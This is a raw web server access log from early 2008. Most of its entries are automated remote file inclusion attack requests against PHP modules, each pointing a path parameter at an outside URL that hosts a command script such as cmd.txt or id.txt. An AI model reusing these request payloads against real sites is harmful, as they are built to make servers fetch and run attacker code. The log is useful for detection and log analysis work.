213.194.149.12 - - [26/Jan/2008:08:28:24 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:08:28:25 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:08:28:25 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:08:30:11 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:08:30:11 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.172.129.117 - - [26/Jan/2008:08:30:12 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:30:38 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:30:38 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:08:30:39 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.217.6 - - [26/Jan/2008:08:31:13 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.231 - - [26/Jan/2008:08:35:40 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:08:36:06 -0800] "GET /index.php?body=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:08:36:31 -0800] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:08:36:32 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:08:36:32 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.140.237 - - [26/Jan/2008:08:36:52 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:08:38:37 -0800] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.74.44 - - [26/Jan/2008:08:39:31 -0800] "GET /logs/index.php?option=com_forum&task=doc_view&gid=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.15.74.44 - - [26/Jan/2008:08:39:31 -0800] "GET /index.php?option=com_forum&task=doc_view&gid=&mosConfig_absolute_path=http://83.19.144.26/cmd.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.6.19.219 - - [26/Jan/2008:08:41:10 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:08:41:59 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:08:42:00 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:08:42:00 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:08:42:42 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:08:42:52 -0800] "GET /index.php?file=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:08:42:52 -0800] "GET /logs/index.php?file=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
216.104.34.34 - - [26/Jan/2008:08:43:23 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:08:44:41 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.161 - - [26/Jan/2008:08:44:56 -0800] "GET /logs/scripts.log HTTP/1.0" 200 135781 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:08:49:16 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:08:49:16 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.102 - - [26/Jan/2008:08:49:20 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:49:23 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:49:23 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:49:23 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:08:49:53 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:08:49:53 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:50:29 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.104.34.34 - - [26/Jan/2008:08:50:38 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.34.34 - - [26/Jan/2008:08:50:38 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.treeoflifeinc.org/media/roman.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [26/Jan/2008:08:51:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [26/Jan/2008:08:51:57 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.52.13.114 - - [26/Jan/2008:08:54:04 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.52.13.114 - - [26/Jan/2008:08:54:04 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:08:54:13 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:08:54:20 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:08:54:21 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:55:03 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.ewg-automation.de/redaxo/include/addons/import_export/pages/safe.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:55:03 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ewg-automation.de/redaxo/include/addons/import_export/pages/safe.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:55:03 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.ewg-automation.de/redaxo/include/addons/import_export/pages/safe.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:08:55:40 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:08:55:41 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:08:56:17 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.ewg-automation.de/redaxo/include/addons/import_export/pages/safe.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.97.0.11 - - [26/Jan/2008:08:56:39 -0800] "GET ///appserv/main.php?appserv_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.58.140.237 - - [26/Jan/2008:09:00:28 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://killerzone.t35.com/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.0.11 - - [26/Jan/2008:09:00:40 -0800] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.97.0.11 - - [26/Jan/2008:09:00:41 -0800] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.194.74.238 - - [26/Jan/2008:09:01:28 -0800] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.194.74.238 - - [26/Jan/2008:09:01:28 -0800] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:01:40 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:01:41 -0800] "GET /logs/access_080106.log///appserv/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:01:41 -0800] "GET ///appserv/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:01:41 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:01:41 -0800] "GET //?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:01:41 -0800] "GET /logs//?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 32488 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:09:01:43 -0800] "GET /logs/access_071230.log///appserv/main.php?appserv_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:09:01:59 -0800] "GET /logs/access_071224.log//modules/Neos_Chronos/header.php?base_folder=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:09:01:59 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:09:01:59 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
18.55.2.206 - - [26/Jan/2008:09:02:15 -0800] "GET /index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
18.55.2.206 - - [26/Jan/2008:09:02:15 -0800] "GET /logs/index.php?option=com_newsfeeds&Itemid=&mosConfig_absolute_path=http://nybap.org/images/rose.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:09:02:18 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:09:02:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:09:02:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:09:02:40 -0800] "GET /dbase.php?action=http://www.biz2byte.de//contenido/cronjobs/stats.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:09:02:40 -0800] "GET /logs/dbase.php?action=http://www.biz2byte.de//contenido/cronjobs/stats.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:04:12 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:04:13 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.99.135 - - [26/Jan/2008:09:04:13 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:04:24 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://dark4.hostinggratisargentina.com/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:09:04:26 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:09:04:27 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:09:04:29 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
128.121.21.39 - - [26/Jan/2008:09:04:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [26/Jan/2008:09:04:46 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.66.129 - - [26/Jan/2008:09:04:54 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bsnet.web.id/data/scn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:09:05:08 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:09:05:09 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:05:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:09:05:34 -0800] "GET /logs/access_071230.log//popup_window.php?site_isp_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:09:05:35 -0800] "GET //popup_window.php?site_isp_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:09:05:35 -0800] "GET /logs//popup_window.php?site_isp_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:09:05:45 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:09:06:25 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:09:06:25 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:09:06:25 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:07:16 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.172.55.178 - - [26/Jan/2008:09:07:19 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:07:39 -0800] "GET /index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.20 - - [26/Jan/2008:09:07:39 -0800] "GET /logs/index.php?body=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.54.46.178 - - [26/Jan/2008:09:08:11 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.1fjb.net/web/bhk/logo1.jpg????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:09:08:16 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:08:27 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:08:28 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [26/Jan/2008:09:08:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.13.114 - - [26/Jan/2008:09:08:40 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.52.13.114 - - [26/Jan/2008:09:08:40 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.68.217.6 - - [26/Jan/2008:09:09:20 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:09:43 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://dark4.hostinggratisargentina.com/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:09:43 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://dark4.hostinggratisargentina.com/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [26/Jan/2008:09:11:02 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://dark4.hostinggratisargentina.com/safe.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:11:17 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:11:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:09:11:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.142.34.18 - - [26/Jan/2008:09:11:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
121.142.34.18 - - [26/Jan/2008:09:11:38 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
